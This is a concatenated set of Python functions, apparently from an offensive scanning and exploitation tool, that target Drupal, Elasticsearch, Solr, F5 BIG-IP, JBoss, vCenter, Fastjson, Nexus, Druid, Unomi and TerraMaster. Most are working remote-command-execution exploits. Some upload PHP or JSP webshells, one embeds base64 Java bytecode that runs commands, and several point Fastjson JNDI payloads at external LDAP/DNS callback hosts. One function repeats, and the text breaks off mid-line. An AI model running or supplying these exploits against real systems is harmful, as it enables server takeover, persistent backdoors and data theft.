def check_vulnerable_7(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format(cmd) data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value=' resp = requests.post(url, data, headers=headers, verify=False) if resp.status_code != 200: return False soup = BeautifulSoup(resp.content, 'lxml') form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value') url = base_url + '/file/ajax/name/%23value/' + form_build_id data = 'form_build_id={0}'.format(form_build_id) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False
def cve_2014_3120_exp(self, cmd): vul_name = "Elasticsearch: CVE-2014-3120" self.data_send_info = r'''{ "name": "cve-2014-3120" }''' self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd) try: self.request = requests.post(self.url + "/website/blog/", data=self.data_send_info, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.post(self.url + "/_search?pretty", data=self.data_rce, headers=self.headers, timeout=self.timeout, verify=False) try: self.r = list(json.loads( self.req.text)["hits"]["hits"])[0]["fields"]["command"][0] except: self.r = "null" raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') verify.exploit_print(self.r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def check_vulnerable_7(base_url): headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = get_random_string() cmd = urllib.quote('echo {0} | base64 -d'.format(base64.b64encode(r))) url = base_url + '/user/password?name[%23post_render][0]=exec&name[%23markup]={0}'.format( cmd) data = 'form_build_id=&form_id=user_pass&_triggering_element_name=name&_triggering_element_value=' resp = requests.post(url, data, headers=headers, verify=False) if resp.status_code != 200: return False soup = BeautifulSoup(resp.content, 'lxml') form_build_id = soup.find('input', {'name': 'form_build_id'}).get('value') url = base_url + '/file/ajax/name/%23value/' + form_build_id data = 'form_build_id={0}'.format(form_build_id) resp = requests.post(url, data, headers=headers, verify=False) if r in str(resp.content): return True return False
def getshell(self, url): ''' TerraMaster 文件上传GetShell函数 :param url: TerraMaster url地址 :return: 返回得到的shell地址 ''' exp_url = url + 'include/upload.php?targetDir=../cgi-bin/filemanage/' headers = { 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' } filename = 'safe.php' with open(filename, 'wb') as fp: fp.write('<?php @eval($_POST[mosin]);?>') files = { 'Filename': (None, filename), 'name': (None, filename), 'chunk': (None, '0'), 'chunks': (None, '1'), 'file': (filename, open(filename, 'rb'), 'application/octet-stream'), 'Upload': (None, '给老子上!') } try: requests.post(exp_url, files=files, headers=headers) shell = url + 'cgi-bin/filemanage/' + filename reqcode = requests.get(shell, headers=headers).status_code except Exception, msg: print '\n[x] ERROR!!!:', msg
def fastjson(self, webapps_identify, url): name = "Fastjson" Identify.identify_prt(name) dns = dns_request() payload1 = '{"e":{"@type":"java.net.Inet4Address","val":"%s"}}' %dns payload2 = '{"@type":"java.net.Inet4Address","val":"%s"}' %dns payload3 = '{{"@type":"java.net.URL","val":"http://%s"}:"x"}' %dns payload4 = '{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"%s"}}""}' %dns payload5 = '{"a":"' headers = {'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close'} try: try: request = requests.post(url, data=payload5, headers=headers, timeout=self.timeout, verify=False) except: pass if r"nested exception is com.alibaba.fastjson.JSONException:" in request.text: if r"application/json" == request.headers['Content-Type']: webapps_identify.append("fastjson") elif r"application/json" in request.headers['Content-Type']: webapps_identify.append("fastjson") else: requests.post(url, data=payload1, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload2, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload3, headers=headers, timeout=self.timeout, verify=False) requests.post(url, data=payload4, headers=headers, timeout=self.timeout, verify=False) if dns_result(dns): webapps_identify.append("fastjson") webapps_identify.append("fastjson [" + dns + "]") except Exception as error: pass
def cve_2014_3120_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Elasticsearch: CVE-2014-3120" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2014_3120.replace( "RECOMMAND", "whoami") self.vul_info["vul_name"] = "Elasticsearch 命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2014-3120" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2014-04-29" self.vul_info["vul_vers"] = "< 1.2" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "命令执行漏洞" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "Elasticsearch 1.2之前的默认配置启用动态脚本编制,该脚本允许远程攻击者通过_search的source" \ "参数执行任意MVEL表达式和Java代码。" self.vul_info["cre_date"] = "2021-01-21" self.vul_info["cre_auth"] = "zhzyker" self.data_send_info = r'''{ "name": "cve-2014-3120" }''' md = random_md5() cmd = "echo " + md self.data_rce = self.payload_cve_2014_3120.replace("RECOMMAND", cmd) try: self.request = requests.post(self.url + "/website/blog/", data=self.data_send_info, headers=self.headers, timeout=self.timeout, verify=False) self.req = requests.post(self.url + "/_search?pretty", data=self.data_rce, headers=self.headers, timeout=self.timeout, verify=False) try: self.r = list(json.loads( self.req.text)["hits"]["hits"])[0]["fields"]["command"][0] except: self.r = "null" if md in self.r: self.vul_info["vul_data"] = dump.dump_all(self.req).decode( 'utf-8', 'ignore') self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info["prt_info"] = "[rce] [cmd: " + cmd + "] " verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2017_12629_exp(self, cmd): vul_name = "Apache Solr: CVE-2017-12629" core_name = "null" new_core = random_md5() payload1 = self.payload_cve_2017_12629.replace( "RECOMMAND", cmd).replace("new_core", new_core) payload2 = '[{"id": "test"}]' url_core = self.url + "/solr/admin/cores?indexInfo=false&wt=json" headers_solr1 = { 'Host': "localhost", 'Accept': "*/*", 'User-Agent': self.ua, 'Connection': "close" } headers_solr2 = { 'Host': "localhost", 'Accept-Language': "en", 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/json" } try: request = requests.get(url_core, headers=self.headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass req = requests.post(self.url + "/solr/" + str(core_name) + "/config", data=payload1, headers=headers_solr1, timeout=self.timeout, verify=False) request = requests.post(self.url + "/solr/" + str(core_name) + "/update", data=payload2, headers=headers_solr2, timeout=self.timeout, verify=False) raw_data = dump.dump_all(req).decode('utf-8', 'ignore') r = "Command Executed Successfully (But No Echo)" verify.exploit_print(r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2020_13942_exp(self, cmd): self.threadLock.acquire() vul_name = "Apache Unomi: CVE-2020-13942" self.payload = self.payload_cve_2020_13942.replace("RECOMMAND", cmd) self.headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Content-Type': 'application/json' } try: req = requests.post(self.url + "/context.json", data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(req).decode('utf-8', 'ignore') r = "Command Executed Successfully (But No Echo)" verify.exploit_print(r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_22986_exp(self, cmd): vul_name = "F5 BIG-IP: CVE-2021-22986" headers = { 'User-Agent': self.ua, 'Accept': '*/*', 'Connection': 'close', 'Authorization': 'Basic YWRtaW46', 'X-F5-Auth-Token': '', 'Content-Type': 'application/json' } data = r'''{"command": "run", "utilCmdArgs": "-c 'RECOMMAND'"}'''.replace( "RECOMMAND", cmd) url = urljoin(self.url, "/mgmt/tm/util/bash") try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = json.loads(request.text)["commandResult"] self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def cve_2019_6340_exp(self, cmd): vul_name = "Drupal: CVE-2019-6340" self.path = "/node/?_format=hal_json" self.cmd_len = len(cmd) self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd, self.url) self.headers = { 'User-Agent': self.ua, 'Connection': "close", 'Content-Type': "application/hal+json", 'Accept': "*/*", 'Cache-Control': "no-cache" } try: request = requests.post(self.url + self.path, data=self.payload, headers=self.headers, timeout=self.timeout, verify=False) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def fastjson_1224_2_exp(self, cmd): vul_name = "Fastjson: VER-1224-2" headers = { 'User-Agent': self.ua, 'Content-Type': 'application/json', 'Testcmd': cmd, 'Connection': 'close' } data = { "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", "_bytecodes": [ "yv66vgAAADMA6wEAHnlzb3NlcmlhbC9Qd25lcjk0NDQ5MTgyMDEzMzcwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAZUHduZXI5NDQ0OTE4MjAxMzM3MDAuamF2YQEACXdyaXRlQm9keQEAFyhMamF2YS9sYW5nL09iamVjdDtbQilWAQAkb3JnLmFwYWNoZS50b21jYXQudXRpbC5idWYuQnl0ZUNodW5rCAAJAQAPamF2YS9sYW5nL0NsYXNzBwALAQAHZm9yTmFtZQEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAA0ADgoADAAPAQALbmV3SW5zdGFuY2UBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwwAEQASCgAMABMBAAhzZXRCeXRlcwgAFQEAAltCBwAXAQARamF2YS9sYW5nL0ludGVnZXIHABkBAARUWVBFAQARTGphdmEvbGFuZy9DbGFzczsMABsAHAkAGgAdAQARZ2V0RGVjbGFyZWRNZXRob2QBAEAoTGphdmEvbGFuZy9TdHJpbmc7W0xqYXZhL2xhbmcvQ2xhc3M7KUxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7DAAfACAKAAwAIQEABjxpbml0PgEABChJKVYMACMAJAoAGgAlAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAnAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAApACoKACgAKwEACGdldENsYXNzAQATKClMamF2YS9sYW5nL0NsYXNzOwwALQAuCgAEAC8BAAdkb1dyaXRlCAAxAQAJZ2V0TWV0aG9kDAAzACAKAAwANAEAIGphdmEvbGFuZy9DbGFzc05vdEZvdW5kRXhjZXB0aW9uBwA2AQATamF2YS5uaW8uQnl0ZUJ1ZmZlcggAOAEABHdyYXAIADoBAB9qYXZhL2xhbmcvTm9TdWNoTWV0aG9kRXhjZXB0aW9uBwA8AQAEQ29kZQEACkV4Y2VwdGlvbnMBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwBAAQANU3RhY2tNYXBUYWJsZQEABWdldEZWAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7DABFAEYKAAwARwEAHmphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbgcASQEADWdldFN1cGVyY2xhc3MMAEsALgoADABMAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWDAAjAE4KAEoATwEAImphdmEvbGFuZy9yZWZsZWN0L0FjY2Vzc2libGVPYmplY3QHAFEBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgwAUwBUCgBSAFUBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcAVwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABZAFoKAFgAWwEAEGphdmEvbGFuZy9TdHJpbmcHAF0BAAMoKVYMACMAXwoABABgAQAQamF2YS9sYW5nL1RocmVhZAcAYgEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwwAZABlCgBjAGYBAA5nZXRUaHJlYWRHcm91cAEAGSgpTGphdmEvbGFuZy9UaHJlYWRHcm91cDsMAGgAaQoAYwBqAQAHdGhyZWFkcwgAbAwAQwBECgACAG4BABNbTGphdmEvbGFuZy9UaHJlYWQ7BwBwAQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7DAByAHMKAGMAdAEABGV4ZWMIAHYBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgwAeAB5CgBeAHoBAARodHRwCAB8AQAGdGFyZ2V0CAB+AQASamF2YS9sYW5nL1J1bm5hYmxlBwCAAQAGdGhpcyQwCACCAQAHaGFuZGxlcggAhAEABmdsb2JhbAgAhgEACnByb2Nlc3NvcnMIAIgBAA5qYXZhL3V0aWwvTGlzdAcAigEABHNpemUBAAMoKUkMAIwAjQsAiwCOAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABZAJALAIsAkQEAA3JlcQgAkwEAC2dldFJlc3BvbnNlCACVAQAJZ2V0SGVhZGVyCACXAQAIVGVzdGVjaG8IAJkBAAdpc0VtcHR5AQADKClaDACbAJwKAF4AnQEACXNldFN0YXR1cwgAnwEACWFkZEhlYWRlcggAoQEAB1Rlc3RjbWQIAKMBAAdvcy5uYW1lCAClAQAQamF2YS9sYW5nL1N5c3RlbQcApwEAC2dldFByb3BlcnR5AQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsMAKkAqgoAqACrAQALdG9Mb3dlckNhc2UMAK0AcwoAXgCuAQAGd2luZG93CACwAQAHY21kLmV4ZQgAsgEAAi9jCAC0AQAHL2Jpbi9zaAgAtgEAAi1jCAC4AQARamF2YS91dGlsL1NjYW5uZXIHALoBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIHALwBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWDAAjAL4KAL0AvwEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7DADBAMIKAL0AwwEAEWphdmEvbGFuZy9Qcm9jZXNzBwDFAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwwAxwDICgDGAMkBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMACMAywoAuwDMAQACXEEIAM4BAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMANAA0QoAuwDSAQAEbmV4dAwA1ABzCgC7ANUBAAhnZXRCeXRlcwEABCgpW0IMANcA2AoAXgDZDAAHAAgKAAIA2wEADWdldFByb3BlcnRpZXMBABgoKUxqYXZhL3V0aWwvUHJvcGVydGllczsMAN0A3goAqADfAQATamF2YS91dGlsL0hhc2h0YWJsZQcA4QEACHRvU3RyaW5nDADjAHMKAOIA5AEAE1tMamF2YS9sYW5nL1N0cmluZzsHAOYBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwDoCgDpAGAAIQACAOkAAAAAAAMACgAHAAgAAgA+AAABLwAIAAUAAAD2Egq4ABBOLbYAFE0tEhYGvQAMWQMSGFNZBLIAHlNZBbIAHlO2ACIsBr0ABFkDK1NZBLsAGlkDtwAmU1kFuwAaWSu+twAmU7YALFcqtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAI06BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAEg6BBI5uAAQTi0SOwS9AAxZAxIYU7YAIi0EvQAEWQMrU7YALE0qtgAwEjIEvQAMWQMtU7YANSoEvQAEWQMsU7YALFenAAOxAAIAAABoAGsANwAAAGgAsAA9AAEAQgAAABcAA/cAawcAN/cARAcAPf0ARAcABAcADAA/AAAABAABAEEACgBDAEQAAgA+AAAAfgADAAUAAAA/AU0qtgAwTqcAGS0rtgBITacAFqcAADoELbYATU6nAAMtEgSm/+csAaYADLsASlkrtwBQvywEtgBWLCq2AFywAAEACgATABYASgABAEIAAAAlAAb9AAoHAFgHAAwI/wACAAQHAAQHAF4HAFgHAAwAAQcASgkFDQA/AAAABAABAEEAAQAjAF8AAgA+AAADNgAIAA0AAAI/KrcA6gM2BLgAZ7YAaxJtuABvwABxOgUDNgYVBhkFvqICHxkFFQYyOgcZBwGmAAanAgkZB7YAdU4tEne2AHuaAAwtEn22AHuaAAanAe4ZBxJ/uABvTCvBAIGaAAanAdwrEoO4AG8ShbgAbxKHuABvTKcACzoIpwHDpwAAKxKJuABvwACLOgkDNgoVChkJuQCPAQCiAZ4ZCRUKuQCSAgA6CxkLEpS4AG9MK7YAMBKWA70ADLYANSsDvQAEtgAsTSu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSmlO2ACzAAF5OLQGlAAottgCemQAGpwBYLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcstgAwEqIFvQAMWQMSXlNZBBJeU7YANSwFvQAEWQMSmlNZBC1TtgAsVwQ2BCu2ADASmAS9AAxZAxJeU7YANSsEvQAEWQMSpFO2ACzAAF5OLQGlAAottgCemQAGpwCNLLYAMBKgBL0ADFkDsgAeU7YANSwEvQAEWQO7ABpZEQDItwAmU7YALFcSprgArLYArxKxtgB7mQAYBr0AXlkDErNTWQQStVNZBS1TpwAVBr0AXlkDErdTWQQSuVNZBS1TOgwsuwC7WbsAvVkZDLcAwLYAxLYAyrcAzRLPtgDTtgDWtgDauADcBDYELQGlAAottgCemQAIFQSaAAanABAsuADgtgDltgDauADcFQSZAAanAAmECgGn/lwVBJkABqcACYQGAaf937EAAQBfAHAAcwBBAAEAQgAAAN0AGf8AGgAHBwACAAAAAQcAcQEAAPwAFwcAY/8AFwAIBwACAAAHAF4BBwBxAQcAYwAAAv8AEQAIBwACBwAEAAcAXgEHAHEBBwBjAABTBwBBBP8AAgAIBwACBwAEAAcAXgEHAHEBBwBjAAD+AA0ABwCLAf8AYwAMBwACBwAEBwAEBwBeAQcAcQEHAGMABwCLAQcABAAAAvsAVC4C+wBNUQcA5ykLBAIMB/8ABQALBwACBwAEAAcAXgEHAHEBBwBjAAcAiwEAAP8ABwAIBwACAAAAAQcAcQEHAGMAAPoABQA/AAAABAABAEEAAQAFAAAAAgAG" ], "_name": "lightless", "_tfactory": { }, "_outputProperties": { } } data = json.dumps(data) try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2015_7501_exp(self, cmd): vul_name = "RedHat JBoss: CVE-2015-7501" self.path = "/invoker/JMXInvokerServlet" self.headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", 'User-Agent': self.ua, "Connection": "close" } try: self.req = requests.post(self.url + self.path, data=self.payload_cve_2015_7501, headers=self.headers, timeout=self.timeout, verify=False) time.sleep(0.5) self.cmd = urlencode({"ppp": cmd}) self.request = requests.get(self.url + "/jexinv4/jexinv4.jsp?" + self.cmd, headers=self.headers, timeout=self.timeout, verify=False) r = self.url + "/jexinv4/jexinv4.jsp?" + self.cmd r += "\n" r += self.request.text self.raw_data = dump.dump_all(self.req).decode('utf-8', 'ignore') verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2021_21972_exp(self, cmd, os_type): vul_name = "Vmware vCenter: CVE-2021-21972" headers = { "User-Agent": self.ua, "Accept": "*/*", "Connection": "close" } try: cmd = cmd path = os.path.split(os.path.realpath(sys.argv[0]))[0] if os_type == "linux": shell_tar = path + "/payload/payload/cve202121972_linux_shell.tar" else: shell_tar = path + "/payload/payload/cve202121972_windows_shell.tar" file = {'uploadFile': open(shell_tar, 'rb')} url = requests.compat.urljoin( self.url, "/ui/vropspluginui/rest/services/uploadova") req = requests.post(url, files=file, headers=headers, timeout=self.timeout, verify=False) url = requests.compat.urljoin(self.url, "/ui/resources/shell.jsp") r = "Payload: " + shell_tar + "\n" + "Behiner jsp webshell (default password:rebeyond) : " + url self.raw_data = dump.dump_all(req).decode('utf-8', 'ignore') verify.exploit_print(r, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception as e: verify.error_print(vul_name)
def fastjson_1224_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Fastjson: 1.2.24" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_payd"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_name"] = "Fastjson 反序列化远程代码执行漏洞" self.vul_info["vul_numb"] = "CVE-2017-18349" self.vul_info["vul_apps"] = "Fastjson" self.vul_info["vul_date"] = "2017-03-15" self.vul_info["vul_vers"] = "<= 1.2.24" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "远程代码执行" self.vul_info["vul_data"] = "null" self.vul_info[ "vul_desc"] = "Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码" self.vul_info["cre_date"] = "2021-01-20" self.vul_info["cre_auth"] = "zhzyker" headers = { 'User-Agent': self.ua, 'Content-Type': "application/json", 'Connection': 'close' } md = dns_request() dns = md data = { "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://" + dns + "//Exploit", "autoCommit": True } } data = json.dumps(data) try: try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) self.vul_info["vul_data"] = dump.dump_all(request).decode( 'utf-8', 'ignore') except: pass if dns_result(md): self.vul_info["vul_payd"] = "ldap://" + dns + "//Exploit] " self.vul_info["prt_resu"] = "PoCSuCCeSS" self.vul_info[ "prt_info"] = "[dns] [payload: ldap://" + dns + "//Exploit] " verify.scan_print(self.vul_info) else: verify.scan_print(self.vul_info) except requests.exceptions.Timeout: verify.timeout_print(self.vul_info["prt_name"]) except requests.exceptions.ConnectionError: verify.connection_print(self.vul_info["prt_name"]) except Exception as e: verify.error_print(self.vul_info["prt_name"]) self.threadLock.release()
def cve_2021_25646_exp(self, cmd): vul_name = "Apache Druid: CVE-2021-25646" url = urljoin(self.url, "/druid/indexer/v1/sampler") headers = { 'Content-Type': 'application/json', 'User-Agent': self.ua, 'Accept': 'text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2', 'Connection': 'keep-alive' } data = self.payload_cve_2021_25646.replace("RECOMMAND", cmd) try: request = requests.post(url, data=data, headers=headers, timeout=self.timeout, verify=False) r = "Command Executed Successfully (But No Echo)" raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def hyuga_co(): headers_hyuga = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36', 'Connection': 'close', 'Accept': '*/*', 'Accept-Language': 'zh,zh-TW;q=0.9,en-US;q=0.8,en;q=0.7,zh-CN;q=0.6' } hyuga_api = "http://api.hyuga.co/v1/users" hyuga_host = globals.get_value("hyuga_domain") hyuga_token = globals.get_value("hyuga_token") try: if r"xxxxxx" in hyuga_host: # 如果没有指定域名和token,就自动获取, 第一次获取token if r"xxxxxx" in hyuga_token: dns = requests.post(hyuga_api, headers=headers_hyuga, timeout=timeout, verify=False) hyuga_host = json.loads(dns.text)["data"]["identity"] dns_host = random_md5() + "." + str(hyuga_host) hyuga_token = json.loads(dns.text)["data"]["token"] globals.set_value("hyuga_token", hyuga_token) globals.set_value("hyuga_domain", hyuga_host) return dns_host else: return "bug" else: dns_host = random_md5() + "." + hyuga_host return dns_host except Exception as e: pass
def fastjson_1247_exp(self, rmi_ldap): vul_name = "Fastjson: VER-1247" headers = {'User-Agent': self.ua, 'Content-Type': "application/json"} data = { "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": rmi_ldap, "autoCommit": True } } data = json.dumps(data) try: request = requests.post(self.url, data=data, headers=headers, timeout=self.timeout, verify=False) raw_data = dump.dump_all(request).decode('utf-8', 'ignore') r = "Command Executed Successfully (But No Echo)" verify.exploit_print(r, raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2020_10199_exp(self, cmd, u, p): vul_name = "Nexus Repository Manager: CVE-2020-10199" self.session_headers = { 'Connection': 'keep-alive', 'X-Requested-With': 'XMLHttpRequest', 'X-Nexus-UI': 'true', 'User-Agent': self.ua } try: self.us = base64.b64encode(str.encode(u)) self.pa = base64.b64encode(str.encode(p)) self.base64user = self.us.decode('ascii') self.base64pass = self.pa.decode('ascii') self.session_data = { 'username': self.base64user, 'password': self.base64pass } self.request = requests.post(self.url + "/service/rapture/session", data=self.session_data, headers=self.session_headers, timeout=20) self.session_str = str(self.request.headers) self.session = (re.search(r"NXSESSIONID=(.*); Path", self.session_str).group(1)) self.rce_headers = { 'Connection': "keep-alive", 'NX-ANTI-CSRF-TOKEN': "0.6153568974227819", 'X-Requested-With': "XMLHttpRequest", 'X-Nexus-UI': "true", 'Content-Type': "application/json", '404': "" + cmd + "", 'User-Agent': self.ua, 'Cookie': "jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520;" \ "NX-ANTI-CSRF-TOKEN=0.6153568974227819; NXSESSIONID=" + self.session + "" } request = requests.post(self.url + "/service/rest/beta/repositories/go/group", data=self.payload_cve_2020_10199, headers=self.rce_headers) self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore') verify.exploit_print(request.text, self.raw_data) except requests.exceptions.Timeout: verify.timeout_print(vul_name) except requests.exceptions.ConnectionError: verify.connection_print(vul_name) except Exception: verify.error_print(vul_name)
def cve_2019_0193_poc(self): self.threadLock.acquire() self.vul_info["prt_name"] = "Apache Solr: CVE-2019-0193" self.vul_info["prt_resu"] = "null" self.vul_info["prt_info"] = "null" self.vul_info["vul_urls"] = self.url self.vul_info["vul_payd"] = self.payload_cve_2019_0193.replace("RECOMMAND", "whoami") self.vul_info["vul_name"] = "Apache Solr 搜索引擎中的命令执行漏洞" self.vul_info["vul_numb"] = "CVE-2019-0193" self.vul_info["vul_apps"] = "Solr" self.vul_info["vul_date"] = "2019-10-16" self.vul_info["vul_vers"] = "< 8.2.0" self.vul_info["vul_risk"] = "high" self.vul_info["vul_type"] = "Remote Code Execution" self.vul_info["vul_data"] = "null" self.vul_info["vul_desc"] = "在Apache solr的可选模块DatalmportHandler中的DIH配置是可以包含脚本,因此存在安全隐患," \ "在apache solr < 8.2.0版本之前DIH配置中dataconfig可以被用户控制" self.vul_info["cre_auth"] = "zhzyker" core_name = "null" md = random_md5() cmd = "echo " + md payload = self.payload_cve_2019_0193.replace("RECOMMAND", quote(cmd, 'utf-8')) solrhost = self.hostname + ":" + str(self.port) headers = { 'Host': "" + solrhost, 'User-Agent': self.ua, 'Accept': "application/json, text/plain, */*", 'Accept-Language': "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 'Accept-Encoding': "zip, deflate", 'Referer': self.url + "/solr/", 'Content-type': "application/x-www-form-urlencoded", 'X-Requested-With': "XMLHttpRequest", 'Connection': "close" } urlcore = self.url + "/solr/admin/cores?indexInfo=false&wt=json" try: request = requests.get(urlcore, headers=headers, timeout=self.timeout, verify=False) try: core_name = list(json.loads(request.text)["status"])[0] except: pass urlconfig = self.url + "/solr/" + str(core_name) + "/admin/mbeans?cat=QUERY&wt=json" request = requests.get(urlconfig, headers=headers, timeout=self.timeout, verify=False) url_cmd = self.url + "/solr/" + str(core_name) + "/dataimport" request = requests.post(url_cmd, data=payload, headers=headers, timeout=self.timeout, verify=False) if request.status_code == 200 and core_name != "null": self.vul_info["vul_data"] = dump.dump_all(request).decode('utf-8', 'ignore') self.vul_info["prt_resu"] = "PoC_MaYbE" self.vul_info["prt_info"] = "[maybe] [core 